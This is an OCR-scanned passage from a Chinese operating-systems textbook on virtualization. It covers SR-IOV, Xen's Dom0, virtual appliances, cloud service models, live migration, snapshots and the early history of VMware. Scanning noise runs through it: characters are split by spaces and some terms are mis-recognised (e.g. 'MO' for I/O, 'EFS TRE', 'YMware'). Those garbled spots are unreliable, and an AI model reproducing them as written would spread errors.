机 的 CPU， 中 断 向 量 号 是 该 虚拟 机 想 要 的 〈 例 如 66 ) 。 

IO MMU 还 能 帮助 32 位 设备 访问 4GB 以 上 的 物理 内 存 。 通 常 ，32 位 设备 不 能 访问 (如 通过 DMA) 
4GB 以 上 的 地 址 ， 但 IO MMU 可 以 将 32 位 的 设备 地 址 映射 到 更 大 的 物理 地 址 空间 中 。 

2. 设备 域 

另 一 种 处 理 1/O 的 方法 是 专门 指定 一 个 虚拟 机 运行 普通 操作 系统 ， 将 其 他 虚拟 机 的 所 有 I/O 调 用 映射 
过 来 。 在 半 虚 拟 化 中 这 种 方法 能 发 挥 更 大 优势 ， 发 送 到 虚拟 机 管理 程序 的 命令 真实 地 表达 了 客户 操作 系 
统 想 做 的 事情 〈 例 如 读 取 磁 盘 1 的 第 1403 块 ) ， 而 不 是 一 系列 读 写 硬 件 寄存 器 的 命令 。 如 果 是 后 者 ， 虚 拟 
机 管理 程序 需要 扮演 福尔摩斯 来 推断 客户 操作 系 的 目的 。Xen 就 是 使 用 这 种 方法 来 处 理 IO 的 .其 中 专门 
进行 IO 的 虚拟 机 称 作 Dom0 (domain 0), 

在 处 理 IO 虚 拟 化 时 第 二 类 虚拟 机 管理 程序 明显 比 第 一 类 有 优势 ， 因 为 第 二 类 虚拟 机 管理 程序 中 ， 
宿主 操作 系统 包含 了 所 有 连接 到 计算 机 的 设备 的 驱动 程序 。 当 应 用 程序 试图 访问 一 个 特定 的 设备 时 ， 翻 
译 后 的 代码 可 以 调用 现 有 的 设备 驱动 程序 来 完成 工作 。 而 第 一 类 虚拟 机 管理 程序 要 么 自己 包含 设备 驱动 
程序 ， 要么 调用 类 似 宿主 操作 系统 的 Dom0。 随 着 虚拟 机 技术 的 成 熟 ， 未 来 的 硬件 可 能 允许 应 用 程序 以 
一 种 安全 的 方式 直接 访问 ， 这 意味 着 设备 驱动 程序 可 以 直接 链接 到 应 用 代码 中 ,或 者 放 到 独立 的 用 户 态 
系统 服务 中 (如 MINIX3)， 从 而 消除 此 问题 。 

3. 单 根 MO 虚拟 化 

直接 将 一 个 设备 分 配给 一 个 虚拟 机 的 可 伸缩 性 不 好 。 这 种 方式 下 ， 如 果 只 有 4 块 物理 网 卡 ， 则 只 能 
支持 最 多 4 个 虚拟 机 。 要 支持 8 个 虚拟 机 就 需要 8 块 网 卡 。 如 果 需 要 运行 128 个 虚拟 机 ， 那 么 物理 机 就 会 被 
网 线 淹 没 。 

通过 软件 在 多 个 虚拟 机 间 共 享 设备 是 可 行 的 ， 但 不 是 最 优 方案 ， 因 为 在 硬件 驱动 程序 和 客户 操作 系 
统 之 间 插 入 了 一 个 模拟 层 (或 设备 域 )。 模 拟 的 设备 很 难 实 现 硬件 支持 的 全 部 高 级 功能 。 理 想 情况 下 ， 
虚拟 化 技术 能 提供 单个 设备 到 多 个 虚拟 机 中 的 等 效 设备 的 穿 透 功能 而 没有 额外 开销 。 如 果 硬 件 本 身 能 进 
行 虚拟 化 ， 则 虚拟 化 单一 设备 以 使 每 个 虚拟 机 都 认为 自己 拥有 对 设备 的 独占 式 访问 会 容易 得 多 。 在 PCIe 
标准 里 这 种 虚拟 化 称 作 单 根 MO 虚拟 化 。 

单 根 VO 虚拟 化 (Single Root I/O Virtualization, SR-IOV) 允许 驱动 程序 与 设备 间 线 过 虚拟 机 管理 
程序 进行 通信 。 支 持 SR-IOV 的 设备 能 为 每 个 使 用 该 设备 的 虚拟 机 提供 独立 的 地 址 空间 、 中 断 和 DMA 流 
(Intel，2011)。 此 设备 看 起 来 就 像 多 个 独立 的 设备 ， 分 别 分 配 到 不 同 的 虚拟 机 。 例 如 ， 每 个 虚拟 设备 都 
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有 独立 的 基 址 寄存 器 和 地 址 空间 。 虚 拟 机 将 分 配给 它 的 虚拟 设备 的 地 址 空间 映射 到 自己 的 地 址 空间 中 。 

SR-IOV 提 供 两 种 访问 设备 的 方式 ，PF (physical function) 和 VE (virtual function) 。PF 是 完整 的 
PCIe 功 能 ， 人 允许 设备 按 管理 员 认为 合适 的 任意 方式 进行 配置 。PF 在 客户 操作 系统 中 不 可 访问 。VF 是 轻 
量 级 的 PCIe 功 能 ， 不 提供 配置 选项 ， 适 合 虚 拟 机 。 总 之 ，SR-IOV 人 允许 设备 虚拟 化 成 多 达 上 百 个 VF， 让 
每 个 使 用 VF 的 虚拟 机 认为 自己 是 设备 的 唯一 拥有 者 。 例 如 ， 有 了 一 块 SR-IOV 网 卡 ， 虚 拟 机 就 能 像 物 理 
网 卡 一 样 处 理 自己 的 虚拟 网 卡 。 很 多 现代 网 卡其 至 还 有 虚拟 机 独立 的 收发 数据 的 (循环 ) 缓冲 区 。 例 如 ， 
Intel I350 系 列 网 卡 有 8 个 发 送 队列 和 8 个 接收 队列 。 


7.8 虚拟 装置 

虚拟 机 能 够 解决 一 个 困扰 用 户 已 久 的 问题 : 如 何 安装 新 的 应 用 程序 。 解 决 这 一 问题 对 开源 软件 的 用 
户 尤为 重要 。 许 多 应 用 程序 依赖 大 量 其 他 应 用 程序 和 运行 库 ， 这 些 应 用 程序 和 运行 库 又 会 引入 更 多 的 依 
赖 软件 包 。 此 外 ， 还 可 能 有 对 特定 版 本 的 编译 器 、 脚 本 语言 、 操 作 系 统 的 依赖 。 

有 了 虚拟 机 之 后 ， 软 件 开发 人 员 可 以 精心 构造 一 个 虚拟 机 ， 装 上 需要 的 操作 系统 、 编 译 器 、 运 行 库 
和 应 用 程序 代码 ， 固 定 整 个 虚拟 机 使 之 可 以 随时 运行 。 这 个 虚拟 机 镜像 可 以 刻录 到 CD-ROM 或 发 布 到 网 
站 上 让 用 户 安装 或 下 载 。 这 种 方法 意味 着 只 有 软件 开发 人 员 需 要 知道 所 有 的 依赖 关系 。 客 户 得 到 的 是 能 
实际 运行 的 完整 包 ， 与 他 们 使 用 的 操作 系统 和 安装 的 其 他 软件 包 、 运 行 库 完全 无 关 。 这 类 “ 盒 装 ”的 虚 
拟 机 通常 称 作 虚拟 装置 (virtual appliance), 。 例 如 ， 亚 马 逊 的 EC2 云 为 客户 提供 很 多 预先 准备 好 的 虚拟 装 
置 ， 提 供 方 便 的 软件 服务 (软件 即 服务 ，Software As A Service), 


7.9 多 核 CPU 上 的 虚拟 机 


虚拟 机 与 多 核 CPU 的 结合 创造 了 一 个 可 用 CPU 数 量 能 由 软件 设置 的 新 世界 。 如 果 有 4 个 CPU 核 心 ， 
每 个 核心 最 多 可 以 运行 8 个 虚拟 机 ， 则 单个 CPU 可 配置 成 32 节 点 的 多 计算 机 系统 。 根 据 软件 不 同 也 可 以 
配置 成 较 少 的 CPU (节点 ) 数 。 应 用 程序 设计 人 员 可 以 首先 选择 需要 的 CPU 数 量 再 进行 设计 ， 这 一 前 所 
未 有 的 进步 开启 了 计算 机 技术 的 新 阶段 。 

此 外 ， 虚 拟 机 之 间 可 以 共享 内 存 。 这 项 技术 的 一 个 典型 用 例 是 在 服务 器 上 运行 多 个 相同 客户 操作 系 
统 的 实例 。 虚 拟 机 内 存 共享 只 需 将 物理 页 映射 到 多 个 虚拟 机 的 地 址 空间 中 ， 这 项 技术 已 经 用 于 去 重 的 解 
决 方案 中 。 去 重 技术 避免 了 重复 保存 相同 的 数据 ， 在 存储 系统 中 是 相当 常见 的 技术 ， 现 在 也 应 用 到 了 虚 
拟 化 里 。 去 重 在 Disco 中 称 作 透明 页 共享 (transparent page sharing， 需 要 修改 客户 机 )， 在 VMware 中 称 
作 基 于 内 容 的 页 共享 (content-based page sharing， 无 须 任何 修改 )。 一 般 来 说 ， 这 项 技术 反复 扫描 主机 
上 每 个 虚拟 机 的 内 存 并 计算 内 存 页 的 散 列 。 如 果 某 些 页 面 散 列 值 相同 ， 那 么 系统 首先 检查 它们 的 内 容 是 
否 完全 相同 ， 相 同 的 话 就 进行 去 重 : 创建 一 个 包含 实际 内 容 的 页 面 ， 其 他 页 面 引用 此 页 面 。 虚 拟 机 管理 
EFS TRE (ET) 页 表 ， 因 而 这 种 映射 并 不 复杂 。 当 然 ， 任 意 一 个 客户 机 修改 共享 页 时 ， 应 当 
使 修改 操作 对 其 他 虚拟 机 不 可 见 。 这 时 可 以 使 用 写 时 复制 技术 让 修改 的 页 面 为 写 者 所 私有 。 

如 果 虚 拟 机 能 共享 内 存 ， 单 个 计算 机 就 能 成 为 虚拟 的 多 处 理 器 系统 。 由 于 多 核 芯 片上 的 所 有 核心 共 
享 相同 的 RAM， 因 此 单一 的 四 核 芯 片 根据 需要 可 以 很 容易 地 配置 成 32 节 点 多 处 理 器 或 多 计算 机 系统 。 

多 核 、 虚 拟 机 、 虚 拟 机 管理 程序 、 微 内 核 的 结合 将 彻底 改变 人 们 对 计算 机 系统 的 认 知 。 由 程序 员 来 
确定 需要 多 少 CPU， 使 用 多 处 理 器 系统 还 是 多 计算 机 系统 ， 以 及 各 种 不 同 的 极 小 化 内 核 如 何 融 入 整个 系 
统 ， 这 些 问题 是 当前 软件 无 法 解决 的 ， 而 未 来 的 软件 必须 面 对 这 些 问 题 。 如 果 你 是 计算 机 科学 技术 专业 
的 学 生 或 专家 ， 你 可 能 就 是 解决 这 些 问 题 的 那个 人 。 加 油 ! 


7.10 授权 问题 

有 些 软件 按 CPU 数量 授权 ， 尤 其 是 企业 用 软件 。 也 就 是 说 ， 企 业 购 买 一 个 程序 ， 只 有 在 一 个 CPU 上 
运行 的 权利 。 什 么 算是 一 个 CPU? 这 种 合同 是 否 给 了 企业 在 同一 物理 机 器 的 多 个 虚拟 机 上 运行 软件 的 权 
利 ? 许多 软件 生产 商 不 知道 该 怎么 办 才 好 。 

如 果 企业 具有 人 允许 在 n 台 机 器 上 同时 运行 软件 的 授权 ， 问 题 就 会 变 得 更 糟糕 ， 尤 其 是 虚拟 机 可 以 随 
时 按 需 启动 或 停止 。 
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某 些 情况 下 ， 软 件 生产 商会 在 授权 中 显 式 加 入 禁止 在 (未 授权 ) 虚拟 机 上 运行 软件 的 条 款 。 对 于 只 
在 虚拟 机 上 运行 所 有 软件 的 企业 而 言 ， 这 是 个 现实 的 问题 。 这 些 限 制 在 法 庭 上 是 否 站 得 住 脚 以 及 用 户 会 
如 何 响应 还 有 待 观察 。 


7.11 B 


在 云 计 算 令 人 炫目 的 崛起 背后 ， 虚 拟 化 技术 发 挥 了 决定 性 作用 。 云 有 很 多 种 ， 一 些 云 是 公有 的 ， 可 
为 任何 付费 者 提供 资源 ， 另 一 些 则 是 某 个 机 构 私 有 的 。 不 同 云 的 功能 也 有 所 不 同 。 一 些 云 允许 用 户 访问 
物理 硬件 ， 但 绝 大 多 数 云 会 将 物理 环境 虚拟 化 。 一 些 云 除 了 物理 裸 机 或 虚拟 裸 机 外 不 提供 任何 软件 ， 另 
一 些 云 则 提供 可 随意 组 合并 直接 使 用 的 软件 ， 或 是 简单 方便 的 新 服务 开发 平台 。 云 提供 商 通 常 提供 不 同 
类 型 的 资源 ， 例 如 既 有 “大 机 器 ”又 有 “小 机 器 ”。 

提 到 云 ， 很 少 有 人 理解 其 确切 含义 。 美 国 国 家 标准 与 技术 研究 院 (National Institute of Standards 
and Technology) 列 出 了 云 的 五 条 必要 特征 : 

1) 按 需 自助 服务 。 无 需 人 为 操作 就 能 自动 为 用 户 提 供 资 源 。 

2) 普 适 的 网 络 访问 。 所 有 资源 都 可 以 通过 网 络 用 标准 化 的 机 制 访问 ， 以 支持 各 种 异 构 设备 。 

3) 资源 池 。 云 提供 商 拥 有 的 资源 可 以 服务 多 个 用 户 并 动态 再 分 配 ， 用 户 通常 不 知道 他 们 使 用 的 资源 
的 具体 位 置 。 

4) 快速 可 伸缩 。 能 根据 用 户 需求 弹性 甚至 是 自动 地 获取 和 释放 资源 。 

5) 服务 可 计量 。 云 提供 商 按 服务 类 型 计量 用 户 使 用 的 资源 。 


7.11.1 云 即 服务 

本 节 重 点 关注 虚拟 化 和 操作 系统 在 云 中 的 作用 。 我 们 认为 云 的 功能 是 提供 一 个 用 户 可 以 直接 访问 并 
任意 使 用 的 虚拟 机 。 因 而 ， 同 一 个 云 中 可 能 运行 着 不 同 的 操作 系统 (这些 操 作 系 统 很 可 能 运行 在 同一 个 
物理 机 上 ) 。 这 种 云 称 作 基 础 设施 即 服务 (Infrastructure As A Service，IAAS) ， 与 平台 即 服务 (Platform 
As A Service，PAAS， 提 供 包含 特定 操作 系统 、 数 据 库 、Web 服 务 器 等 软件 的 环境 ) 、 软 件 即 服务 
(Software As A Service, SAAS; 提供 特定 软件 的 访问 服务 ， 如 Microsoft Office 365 和 Google Apps 等 ) 
及 其 他 种 类 的 “……: 即 服务 ”相对 应 。IAAS 云 的 一 个 例子 是 Amazon EC2， 它 基于 Xen 虚 拟 机 管理 程序 ， 
包含 数 十 万 物理 机 。 只 要 有 足够 的 资金 就 能 拥有 足够 的 计算 能 力 。 

云 能 改变 企业 进行 计算 的 方式 。 总 体 来 说 ， 将 计算 资源 集中 到 少数 几 个 地 方 (靠近 便宜 的 能 源 和 方 
便 的 冷却 手段 ) 可 以 实现 规模 经 济 效益 。 将 计算 处 理工 作 外 包 意 味 着 不 用 再 过 于 关心 IT 基 础 设施 的 管理 、 
备份 、 维 护 、 折 旧 、 伸 缩 性 、 可 靠 性 、 性 能 甚至 安全 性 。 所 有 这 些 工 作 都 集中 在 一 处 完成 ， 假 设 云 提供 
商 是 称职 的 ， 则 这 些 都 能 很 好 地 完成 。 可 以 想象 ，IT 经 理 们 比 十 年 前 要 轻松 得 多 。 然 而 ， 解 决 了 这 些 问 
题 ， 新 的 问题 又 出 现 了 : 你 真 的 能 信任 云 提供 商 ， 让 他 们 保管 敏感 数据 吗 ? 运行 在 同一 基础 设施 上 的 竟 
争 者 能 推断 出 你 的 私有 信息 吗 ? 你 的 数据 适用 什么 法 律 〈 例 如 ， 如 果 云 提供 商 来 自 美 国 ， 你 的 数据 是 否 
适用 美国 爱国 者 法 案 ， 即 使 你 的 公司 在 欧洲 ) ? 一 旦 你 将 所 有 数据 保存 在 云 X 上 ， 你 能 否 将 数据 全 部 取 
E? 如 果 不 能 ， 你 就 被 挫 在 了 云 X 及 其 提供 商 上 ， 这 一 现象 称 作 供应 商 锁定 (vendor lock-in), 


7.11.2 虚拟 机 迁移 

虚拟 化 技术 不 仅 允 许 IAAS 云 在 同一 硬件 上 同时 运行 多 个 不 同 操作 系统 ， 还 支持 智能 的 管理 机 制 。 
我 们 已 经 介绍 了 虚拟 化 技术 的 资源 过 量 使 用 的 能 力 以 及 与 之 相 结 合 的 去 重 技 术 。 现 在 我 们 看 看 另 一 个 管 
理 问题 ， 如 果 一 台 机 器 需要 检修 (其 至 更 换 ) 时 却 运 行 着 很 多 重要 的 虚拟 机 ， 怎 么 办 ?如 果 因 为 云 提供 
商 想 要 更 换 硬盘 而 导致 系统 停机 ， 用 户 很 可 能 会 有 意见 。 

虚拟 机 管理 程序 将 虚拟 机 与 物理 硬件 解 耦 。 也 就 是 说 ， 虚 拟 机 运行 在 哪 台 机 器 上 并 不 重要 。 因 此 ， 
在 一 台 机 器 需要 检修 时 ， 管 理 员 可 以 简单 地 关闭 所 有 虚拟 机 并 在 另 一 台 机 器 上 重新 启动 它们 。 然 而 ， 这 
样 做 会 带 来 显著 的 停机 时 间 。 挑 战 在 于 不 关闭 虚拟 机 就 将 其 从 需要 检修 的 硬件 迁移 到 新 的 机 器 上 。 

一 个 小 的 改进 是 迁移 时 暂停 而 非 关 闭 虚拟 机 。 在 暂停 过 程 中 ， 将 虚拟 机 使 用 的 内 存 页 尽快 复制 到 新 
机 器 上 ， 在 新 的 虚拟 机 管理 程序 上 配置 好 并 恢复 执行 。 除 了 内 存 之 外 ， 还 需要 迁移 存储 和 网 络 连接 ， 如 
果 物 理 机 器 距离 较 近 ， 则 迁移 过 程 也 会 相对 较 快 。 首 先 可 以 使 用 基于 网 络 的 文件 系统 ， 以 使 虚拟 机 运行 
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在 哪个 机 架 上 变 得 无 关 紧 要 。 类 似 地 ， 了 地址 可 以 简单 地 转换 到 新 位 置 。 不 过 ， 仍 然 需 要 将 虚拟 机 暂停 
一 段 时 间 ， 可 能 比 关机 迁移 时 间 短 一 些 ， 但 还 是 比较 耗 时 的 。 

现代 虚拟 化 解决 方案 提供 的 是 热 迁移 (live migration) ， 虚 拟 机 迁移 时 仍 能 运转 。 例 如 ， 使 用 内 存 
预 复制 迁移 (pre-copy memory migration) ， 能 在 虚拟 机 提供 服务 的 同时 复制 内 存 页 。 大 多 数 内 存 页 的 写 
入 并 不 频繁 ， 直 接 复制 是 安全 的 。 但 是 ， 虚 拟 机 仍 在 运行 ， 所 以 页 面 复制 之 后 可 能 会 被 修改 。 页 面 修改 
时 将 其 标记 为 脏 的 ， 以 确保 最 新 版 本 复制 到 目标 机 器 。 脏 页 面 会 重新 复制 。 当 大 多 数 页 面 复制 完成 后 ， 
只 剩 少量 脏 页 面 。 短 暂 地 暂停 虚拟 机 以 复制 它们 ， 然 后 在 目标 机 器 上 恢复 虚拟 机 执行 。 虽 然 仍 有 暂停 ， 
但 时 间 很 短 ， 应 用 程序 通常 不 会 受到 影响 。 若 停机 时 间 不 算 太 耗 时 ， 就 称 作 无 缝 热 迁移 (seamless live 


migration) 。 


7.11.3 检查 点 

虚拟 机 与 物理 硬件 的 解 耦 还 有 其 他 优势 ， 尤 其 是 可 以 暂停 一 个 虚拟 机 ， 这 很 有 用 。 如 果 和 暂停 的 虚拟 
机 的 状态 〈 例 如 CPU 状态 、 内 存 页 、 存 储 状态 ) 保存 在 磁盘 上 ， 就 成 为 运行 中 的 虚拟 机 的 快照 。 当 软件 
导致 运行 中 的 虚拟 机 崩溃 时 ， 就 可 以 回 滚 到 快照 保存 的 状态 ， 若 无 其 事 地 继续 运行 。 

保存 快照 的 最 直接 方式 是 复制 所 有 状态 ， 包 括 完整 的 文件 系统 。 然 而 ， 即 使 磁盘 速度 很 快 ， 复 制 上 
TB 的 磁盘 内 容 也 会 花 点 时 间 。 和 前 面 的 虚拟 机 迁移 相同 ， 我 们 不 想 暂停 太 久 。 解 决 方案 是 使 用 写 时 复 
制 技术 ， 数 据 只 有 在 绝对 必需 时 才 进 行 复制 。 

快照 相当 好 用 ， 但 还 有 些 问 题 。 如 果 虚 拟 机 正在 与 远程 机 器 交互 怎么 办 ? 可 以 保存 系统 快照 并 稍 后 
重新 启动 ， 但 通信 连接 早 就 断 开 了 。 显 然 ， 这 是 一 个 无 法 解决 的 问题 。 


7.12 案例 研究 : VMware 


自 1999 年 以 来 ， VMware 公司 就 是 领先 的 桌面 、 服 务 器 、 云 甚至 手机 虚拟 化 解决 方案 提供 商 。 
VMware 不 仅 提供 虚拟 机 管理 程序 ， 还 提供 用 于 大 规模 管理 虚拟 机 的 软件 。 

在 此 案例 研究 中 ， 首 先 介绍 VMware 公司 的 起 源 历 史 。 然 后 介绍 VMware Workstation， 这 是 一 个 第 
二 类 虚拟 机 管理 程序 ， 也 是 该 公司 的 首 个 产品 。 我 们 将 介绍 它 的 设计 挑战 和 解决 方案 中 的 要 素 ， 以 及 
VMware Workstation 的 演变 历程 。 最 后 ， 介 绍 VMware 的 第 一 类 虚拟 机 管理 程序 ESX Server, 


7.12.1 VMware 的 早期 历史 

使 用 虚拟 机 的 想法 在 20 世 纪 60 年 代 和 70 年 代 的 计算 机 工业 界 和 学 术 研 究 中 很 热门 ， 但 80 年 代 个 人 计 
算 机 兴起 之 后 人 们 就 失去 了 对 虚拟 化 的 兴趣 。 只 有 IBM 的 大 型 机 部 门 还 关心 虚拟 化 。 那 时 的 计算 机 体系 
结构 ， 特 别 是 Intel 的 x86 体 系 结构 不 支持 虚拟 化 ( 即 不 符合 Popek-Goldberg 准 则 )。 这 相当 令 人 遗憾 ， 因 
为 386 处 理 器 是 在 Popek-Goldberg 论 文 发 表 十 年 后 设计 的 ， 设 计 者 当时 应 对 虚拟 化 有 更 深 了 解 。 

1997 年 ， 未 来 VMware 的 三 位 创建 者 在 斯 坦 福 大 学 构建 了 一 个 原型 虚拟 机 管理 程序 Disco (Bugnion 
等 人 ，1997) ， 目 标 是 在 当时 处 于 开发 中 的 大 规模 多 处 理 器 系统 FLASH 上 运行 商用 操作 系统 (特别 是 
UNIX)。 在 此 项 目 中 ， 几 位 作者 意识 到 使 用 虚拟 机 可 以 简单 优雅 地 解决 一 些 系统 软件 难题 ， 可 以 在 现 有 
操作 系统 的 下 面 一 层 进行 创新 ， 而 不 必 试 图 在 操作 系统 内 解决 问题 。 来 自 Disco 项 目的 研究 表明 ， 现 代 
操作 系统 的 高 度 复杂 性 使 得 创新 困难 ， 而 虚拟 机 管理 程序 的 相对 简单 性 及 其 在 软件 栈 中 的 位 置 提供 了 应 
对 操作 系统 复杂 性 的 有 力 立 足 点 。 虽 然 Disco 针 对 的 是 大 型 服务 器 ， 为 MIPS 体 系 结构 设计 ,但 是 作者 意 
识 到 同样 的 方法 可 以 用 于 x86， 并 且 在 商业 上 是 有 价值 的 。 

为 此 ，VMware 公 司 1998 年 成 立 ， 目 标 是 将 虚拟 化 引入 x86 体 系 结构 和 个 人 计算 机 工业 。VMware 的 
首 个 产品 (VMware Workstation) 是 32 位 x86 平 台 上 的 第 一 个 虚拟 化 解决 方案 。 该 产品 发 布 于 1999 年 ， 
有 两 个 版 本 : 运行 在 Linux 宿 主 操作 系统 上 的 第 二 类 虚拟 机 管理 程序 VMware Workstation for Linux, 
运行 在 Windows NT 宿主 操作 系统 上 的 第 二 类 虚拟 机 管理 程序 YMware Workstation for Windows。 两 个 
版 本 功能 相同 ， 用 户 可 以 创建 虚拟 机 ， 指 定 虚拟 硬件 配置 (例如 内 存 大 小 、 虚 拟 磁 盘 大 小 )， 选 择 操作 
系统 并 (从 虚拟 CD-ROM) 安装 到 虚拟 机 。 

VMware Workstation 主 要 针对 开发 者 和 IT 专 家 。 在 引入 虚拟 化 之 前 ,开发 者 桌 上 通常 有 两 台 计 算 机 : 
一 台 用 于 开发 ， 系 统 稳定 ， 另 一 台 在 需要 时 可 以 重 装 系 统 以 进行 测试 。 有 了 虚拟 化 之 后 ， 第 二 台 计 算 机 
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可 以 使 用 虚拟 机 代替 。 

很 快 ，VMware 开 始 开发 更 加 复杂 的 第 二 个 产品 ， 即 发 布 于 2001 年 的 ESX Server, ESX Server 使 用 
与 VMware Workstation 相 同 的 虚拟 化 引擎 ， 但 包装 成 了 第 一 类 虚拟 机 管理 程序 。 也 就 是 说 ，ESX Server 
直接 在 硬件 上 运行 ， 不 需要 宿主 操作 系统 。ESX 虚 拟 机 管理 程序 为 整合 高 强度 工作 负载 设计 ， 包 含 很 多 
优化 以 确保 所 有 资源 (CPU、 内 存 和 1/O) 有 效 且 公平 地 分 配给 虚拟 机 。 例 如 ，ESX Server 首 先 引 入 了 气 
球 的 概念 ， 在 虚拟 机 之 间 重 新 调整 内 存 (Waldspurger, 2002), 

ESX Server 针 对 服务 器 整合 市 场 。 在 引入 虚拟 化 之 前 ，IT 管 理 员 通 常会 购买 、 安 装 并 配置 新 的 服务 
器 ， 用 于 数据 中 心里 运行 的 每 个 新 任务 或 应 用 程序 。 结 果 导 致 基础 设施 利用 效率 很 低 ，( 高 峰 期 ) 利用 
率 通常 只 有 10%。 有 了 ESX Server，IT 管 理 员 可 以 将 很 多 独立 的 虚拟 机 整合 到 一 台 服 务 器 中 ， 节 省 时 间 、 
空间 、 资 金 和 能 源 。 

2002 年 ，VMware 推 出 了 第 一 个 用 于 ESX Server 的 虚拟 机 管理 解决 方案 ， 最 初 称 作 Virtual Center, 
现在 名 为 vSphere。 它 提供 虚拟 机 服务 器 集群 的 单 点 管理 : IT 管理 员 只 需 简 单 地 登录 Virtual Center 应 用 程 
序 ， 就 能 控制 、 监 视 和 预备 供应 整个 企业 中 的 虚拟 机 。Virtual Center 带 来 了 另 一 个 重要 创新 : VMotion 
(Nelson 等 人 ，2005) 允许 运行 中 的 虚拟 机 在 网 络 中 热 迁 移 。IT 管 理 员 首次 可 以 将 运行 中 的 计算 机 从 一 
个 位 置 搬 到 另 一 个 位 置 而 不 必 重 启 操作 系统 和 应 用 程序 ， 甚 至 不 用 断 开 网 络 连接 。 

7.12.2 VMware Workstation 

VMware Workstation 是 32 位 x86 计 算 机 的 首 个 虚拟 化 产品 。ACM 于 2009 年 向 VMware Workstation 
1.0 for Linux 的 作者 颁发 了 ACM 软 件 系统 奖 (ACM Software System Award), ， 此 次 对 虚拟 化 的 认可 在 计 
算 机 工业 界 和 学 术 界 都 有 深远 影响 。 一 篇 论文 (Bugnion 等 人 ，2012) 描述 了 最 初版 本 VMware 
Workstation 中 的 技术 细节 ， 下 面 概要 介绍 论文 内 容 。 

最 初 的 想法 是 ， 虚 拟 化 层 在 由 x86 CPU 构建 并 主要 运行 Microsoft Windows 操 作 系统 的 商业 平台 (E 
WinTel 平 台 ) 上 可 能 会 有 用 。 虚 拟 化 的 优势 可 以 帮助 解决 一 些 WinTel 平 台 已 知 的 缺陷 ， 例 如 应 用 程序 互 
操作 性 、 操 作 系统 迁移 、 可 靠 性 和 安全 性 。 另 外 ， 虚 拟 化 还 允许 其 他 操作 系统 共存 ， 特 别 是 Linux。 

虽然 在 大 型 机 上 虚拟 化 技术 的 研究 和 商业 开发 已 有 几 十 年 历史 ， 但 是 x86 平 台 有 很 大 的 不 同 ， 需 要 
采用 新 的 方法 。 例 如 ， 大 型 机 是 垂直 整合 的 (vertically integrated) ， 单 一 生产 商 设计 制造 硬件 、 虚 拟 机 
管理 程序 、 操 作 系统 和 大 多 数 应 用 程序 。 

相 比 之 下 ，x86 工 业界 一 直 有 至 少 四 个 不 同 领域 : Intel 和 AMD 生 产 处 理 器 ，Microsoft 提 供 Windows， 
开源 社区 提供 Linux， 一 些 厂 商 生 产 IO 设 备 、 外 设 及 其 驱动 程序 ，HP 和 Dell 等 系统 整合 商 构建 用 于 零售 
的 计算 机 系统 。 对 于 x86 平 台 ， 虚 拟 化 首先 需要 在 没有 这 些 科 技 公 司 支持 的 情况 下 完成 。 

x86 平 台 厂 商 分 散 ， 因 而 VMware Workstation 与 经 典 虚 拟 机 管理 程序 不 同 。 后 者 作为 单一 生产 商 的 
显 式 支 持 虚拟 化 的 体系 结构 的 一 部 分 设计 ， 而 VMware Workstation 是 为 x86 体 系 结构 及 围绕 x86 展 开 的 工 
业界 进行 设计 的 。VMware Workstation 整 合 了 虚拟 化 技术 以 及 其 他 领域 的 新 技术 ， 以 应 对 新 挑战 。 

接 下 来 讨论 构建 VMware Workstation 的 技术 挑战 。 


7.12.3 将 虚拟 化 引入 x86 的 挑战 

回忆 对 虚拟 机 和 虚拟 机 管理 程序 的 定义 ， 虚 拟 机 管理 程序 将 著名 的 添加 间接 层 原 则 (adding a level 
of indirection) 应 用 到 计算 机 硬件 领域 ， 将 硬件 抽象 为 虚拟 机 器 : 底层 硬件 的 多 个 复制 品 ， 每 个 都 运行 
独立 的 操作 系统 。 虚 拟 机 之 间 互 相隔 离 ， 每 个 都 像 是 底层 硬件 的 复制 品 ， 理 想 情 况 下 与 物理 机 运行 速度 
相同 。VMware 将 下 面 这 些 虚 拟 机 的 核心 特征 适 配 到 x86 平 台 : 

1) 兼容 性 。 虚 拟 机 提供 本 质 上 与 物理 机 相同 的 环境 ， 这 意味 着 任何 x86 操 作 系统 和 所 有 应 用 程序 都 
能 无 需 修改 就 能 运行 在 虚拟 机 上 。 虚 拟 机 管理 程序 需要 在 硬件 层面 提供 足够 的 兼容 性 ， 以 使 用 户 能 不 受 
限制 地 运行 任意 (版 本 的 ) 操作 系统 。 

2) 性 能 。 虚 拟 机 管理 程序 的 性 能 开销 要 足够 低 ， 以 使 用 户 能 将 虚拟 机 作为 主要 工作 环境 。 以 此 为 目 
标 ，VMware 的 设计 者 们 希望 能 以 接近 本 地 执行 的 速度 运行 相关 的 工作 负载 。 在 最 坏 的 情况 下 ， 虚 拟 机 
运行 于 最 新 一 代 处 理 器 上 的 性 能 要 与 前 一 代 处 理 器 的 本 地 性 能 相同 。 这 是 基于 “大 多 数 x86 软 件 不 会 设 
计 成 只 能 运行 在 最 新 一 代 处 理 器 上 ”的 观察 经 验 。 
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3) 隔离 。 虚 拟 机 管理 程序 必须 保证 虚拟 机 的 隔离 ， 不 能 对 其 中 运行 的 软件 做 任何 假设 。 也 就 是 说 虚 
拟 机 管理 程序 需要 完全 掌控 所 有 资源 ， 避 免 运行 在 虚拟 机 中 的 软件 访问 任何 可 能 对 其 造成 破坏 的 资源 。 
类 似 地 ， 虚 拟 机 管理 程序 还 要 保证 不 属于 虚拟 机 的 所 有 数据 的 隐私 。 虚 拟 机 管理 程序 必须 假设 客户 操作 
系统 可 能 会 感染 未 知 的 恶意 代码 〈 比 大 型 机 时 代 重 要 得 多 )。 

这 三 个 需求 间 不 可 避免 地 存在 冲突 。 例 如 ,， 某 些 领 域 的 完全 兼容 性 可 能 对 性 能 造成 不 利 影响 ， 这 种 
情况 下 VMware 的 设计 者 们 需要 在 兼容 性 上 让 步 。 然 而 ， 他 们 不 会 在 虚拟 机 隔离 上 让 步 ， 不 会 将 虚拟 机 
管理 程序 暴露 在 恶意 客户 机 的 攻击 之 下 。 总 体 来 说 有 四 大 挑战 ; 

1) x86 体 系 结构 不 可 虚拟 化 。 其 中 包含 虚拟 化 敏感 的 非特 权 指令 ， 违 背 了 Popek-Goldberg 的 严格 虚 
拟 化 准则 。 例 如 ，POPF 指 令 根 据 当 前 运行 的 软件 是 否 被 允许 关中 断 而 具有 不 同 ( 且 不 会 陷入 ) 的 语义 。 
这 个 特点 排除 了 传统 的 陷入 并 模拟 的 虚拟 化 方法 。 甚 至 Intel 公 司 的 工程 师 们 都 确信 自己 的 处 理 器 在 实际 
意义 上 不 可 虚拟 化 。 

